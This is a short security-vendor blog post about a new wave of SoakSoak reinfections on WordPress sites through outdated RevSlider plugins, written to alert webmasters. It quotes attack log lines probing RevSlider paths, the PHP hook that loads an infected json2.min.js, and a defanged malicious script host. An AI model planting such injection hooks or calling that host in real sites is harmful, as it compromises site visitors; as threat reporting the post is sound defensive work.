SoakSoak Campaign Evolves – New Wave of Attacks

1 minute read

Since Sunday, we have seen a new wave of SoakSoak reinfections. The Javascript continues to evolve and load other scripts in order to infect additional websites. We have updates for concerned webmasters looking to stay on top of the threat and keep their site protected against these kinds of attacks.

To those websites that have ignored or otherwise have not been made aware of our advice to update RevSlider plugin. We are seeing server logs showing attempts to locate and infect old versions of RevSlider (<4.2):

[21/Dec/2014:09:48:14 -0500] “POST /wp-content/plugins/revslider/temp/update_extract/revslider/license.php HTTP/1.1″ 200 357 “-” “Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0″

[21/Dec/2014:09:48:15 -0500] “POST /wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php HTTP/1.1″ 200 474 “-” “Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0″

This time the malware authors changed the Javascript file that they inject the malicious code into. Now it’s wp-includes/js/json2.min.js. The corresponding code in wp-includes/template-loader.php has changed as well:

function Func11()
{
wp_enqueue_script('json2');
}
add_action('wp_enqueue_scripts', 'Func11');

The malicious code in wp-includes/js/json2.min.js still loads the wp-includes/js/swfobjct.swf (click here for full payload analysis) Flash file (100% malicious), but the code now is more elaborate. Here you can see the decoded version:

Decode malware in json2.min.js

Decode malware in json2.min.js

The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js.

We will continue to monitor the situation and provide more information from our research labs. Webmasters who are already using our Website Firewall don’t need to worry, as they are protected against this and other zero-day threats.

Spotlight on Women in Cybersecurity

less than 1 minute read

Sucuri is committed to helping women develop their careers in technology. On International Women’s Day, Sucuri team members share their insights into workin...

Hacked Website Trend Report – 2018

less than 1 minute read

We are proud to be releasing our latest Hacked Website Trend Report for 2018. This report is based on data collected and analyzed by the GoDaddy Security / ...